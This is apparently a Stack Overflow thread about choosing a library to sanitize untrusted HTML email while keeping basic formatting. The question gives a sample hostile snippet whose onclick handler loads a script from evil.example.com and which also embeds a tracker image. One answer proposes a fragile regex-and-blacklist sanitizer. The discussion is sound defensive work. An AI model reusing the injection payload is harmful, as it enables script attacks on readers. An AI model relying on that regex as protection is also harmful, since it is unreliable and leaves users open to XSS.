What can I use to sanitize received HTML while retaining basic formatting?

Asked 30/12, 2010 at 10:17 Answered 20/11, 2014 at 15:31

This is a common problem, I'm hoping it's been thoroughly solved for me.

In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)

The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that's okay.

We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I've found so far:

The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?

For example, we want to remove things like:

script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>

would become

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)

Lastly answered 30/12, 2010 at 10:17 Comment(1)

Good question. Manual parsing would be a nightmare. – Destiny 30/12, 2010 at 14:39

This is an older, but still relevant question.

We are using the HtmlSanitizer .Net library, which:

is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)

Also on NuGet

Newsmonger answered 20/11, 2014 at 15:31 Comment(1)

Looks nice! Thanks! These days, of course, the question would be closed as a "recommendation" question. I really appreciate your answering anyway. – Lastly 20/11, 2014 at 16:3

I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.

See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.

Elute answered 30/12, 2010 at 15:47 Comment(5)

Thanks! Yes, while a parser is a significant piece, as I mentioned vis-a-vis the HTML Agility Pack, another significant piece is knowing what to leave out / what to keep in. I'd rather stand on shoulders than create my own list from scratch... (But if I have to, I will.) Thanks for the parser links! – Lastly 30/12, 2010 at 16:2

Look at the transform section here htmlcleaner.sourceforge.net/parameters.php#transform. It has provision of skipping the tags – Elute 30/12, 2010 at 16:6

Yes, I understand. My point is the list of tags (and attribute and ...) to skip. – Lastly 30/12, 2010 at 16:11

@T.J.: You have it a bit backwards, use a tag and attribute whitelist (i.e. allow only these things through) rather than a blacklist (i.e. don't allow these things through); you'll also want to sanitize src, href, style, ... attributes if you're letting them through. Knowing what is safe is easier than knowing what isn't, whitelisting also makes styling easier. – Magdalenamagdalene 2/1, 2011 at 21:13

@mu is too short: Yes, sorry, it's not clear from the question but I'm clear that it needs to be a whitelist, not a blacklist. – Lastly 2/1, 2011 at 22:13

I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.

This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.

Veto answered 2/1, 2011 at 20:17 Comment(1)

Thanks. Such a viewer would also have to have a means of allowing me to control (prevent) all requests for external resources (like tracking images and such). A pure renderer would presumably do that as a by-product of wanting me to supply something to retrieve the reference for it, though. :-) Cheers, – Lastly 25/1, 2011 at 16:37

I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.

Anthracoid answered 2/1, 2011 at 17:29 Comment(1)

Thanks. PHP is completely out of the equation, but that doesn't mean I can't look at their whitelist for some inspiration. – Lastly 2/1, 2011 at 17:31

Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes. Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple. No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things. So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.

replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")

(b|i|p|br) <- this is the list of allowed tags, feel free to add some.

this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick

if i do this:

(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>

tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.

maybe a second regex pass with

(?!<[^<>\s]+)\s[^</>]+(?=[/>])

am i right? can this be composed into a single pass?

we still have no relation between tags (opening/closing), no great deal till now. Can the attribute remove be write to remove all not from a white lists? (possibly yes).

a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with

<(script|object|embed)[^>]*>.*</\1>

that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.

note: all with "gi"

edit:

joined all the above on this function

String.prototype.sanitizeHTML=function (white,black) {
   if (!white) white="b|i|p|br";//allowed tags
   if (!black) black="script|object|embed";//complete remove tags
   e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
   return this.replace(e,"");
}

-black list -> complete remove tag and content -white list -> retain tags other tags are removed but tag content is retained all attributes of white list tag's (the remaining ones) are removed

still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

Extravagancy answered 30/12, 2010 at 10:17 Comment(0)

Recommended topics

Hot tags